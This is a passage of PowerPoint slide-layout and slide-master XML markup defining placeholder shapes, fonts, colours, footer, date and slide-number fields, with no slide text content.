                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FF1F2E0-CDF7-E149-BDA8-BC7648389ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6A327EE2-87EE-5C48-9045-0C3B656E5D11}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3986255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75990" y="404813"/>
            <a:ext cx="8506420" cy="981038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6300" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745049" y="1352075"/>
            <a:ext cx="8568303" cy="441467"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D57F147-DC9F-DB47-886E-680CDD09C144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8DF258B-647C-154B-A5A3-C1ACD6D052A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0DD9B860-D74C-474D-8EC3-FDD35956669E}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA49CC04-E96E-8444-9274-A8229BEEBEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0AB1E90B-99ED-174C-B812-D75A8ECFCC2B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425817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75990" y="404813"/>
            <a:ext cx="8506420" cy="981038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6300" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1787652"/>
            <a:ext cx="4375404" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180076" y="1787652"/>
            <a:ext cx="4375404" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA18DC1A-A627-224F-B8C5-D9E4AF2D621D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB8FFF4E-A215-684A-B8B4-1769F448D4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0B081980-1FB7-8E46-97DC-C48E1275BC4D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Holder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFF7CB8-8EF3-4544-A031-195230F90E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AF0AC488-1C7D-0E46-895C-92FBFE913220}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3900856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75990" y="404813"/>
            <a:ext cx="8506420" cy="981038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6300" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{665BFA47-DDCD-F64B-96F6-0346FCD80944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30EF17D6-EBB2-5042-AFA2-6EE977749B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F5BAA87A-FF2B-2A45-B784-66464A850E7D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBAD69B-B628-C14C-801F-A4A3B16CAE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FCD677A0-0174-F147-AD8A-4E578887B527}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25190206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Holder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCCAA20-F550-C24C-8ED7-956D3DF76019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515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 name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DAA0DB2-39F2-2B48-91B4-762CB1F62129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2750" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E213B81C-14D8-C447-B69B-C717E6E8FF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="276225"/>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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5A59B9-3A1B-0D47-9B86-338AFBB07F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="276225"/>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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{48F83C9D-2841-E948-8D9A-E3A5E3B1318C}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E99006B-4D47-114E-A0AB-97DE0B0D2C2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="276225"/>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5AF002B6-C19C-B54C-82B4-1586D300B2B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396" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="912793" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1369188" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1825584" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri"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454025" indent="3175" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="911225" indent="3175" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1368425" indent="3175" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1822450" indent="6350" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2281982">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2738379">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3194776">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3651170">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr marL="0">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="456396">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="912793">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1369188">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1825584">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2281982">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2738379">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3194776">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="365117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Holder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA57B1C-A9E3-8C4A-B534-BCA317DE5A52}"/>
              </a:ext>
            </a:extLst>
